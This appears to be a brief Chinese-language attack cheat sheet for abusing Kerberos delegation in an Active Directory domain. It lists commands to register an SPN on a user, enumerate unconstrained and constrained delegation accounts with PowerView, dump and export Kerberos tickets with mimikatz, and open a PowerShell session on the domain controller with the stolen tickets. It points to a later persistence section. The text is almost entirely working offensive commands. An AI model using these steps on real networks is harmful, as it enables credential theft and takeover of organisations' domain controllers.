设置用户y为服务账户(服务账户有委派权限)
>setspn -U -A variant/golden y

查询非受限委派域内账号，使用powerview
>Get-NetUser -Unconstrained -Domain zone.com

利用
管理员权限打开mimikatz导出TGT
>privilege::debug
>sekurlsa::tickets /export

清空票据，导入票据

获得Powershell会话
> Enter-PSSession -ComputerName dc.zone.com

查询受限委派用户
> Get-DomainUser -TrustedToAuth –Domain zone.com

查询受限委派主机
> Get-DomainComputer -TrustedToAuth -Domain zone.com

利用方法后见权限维持模块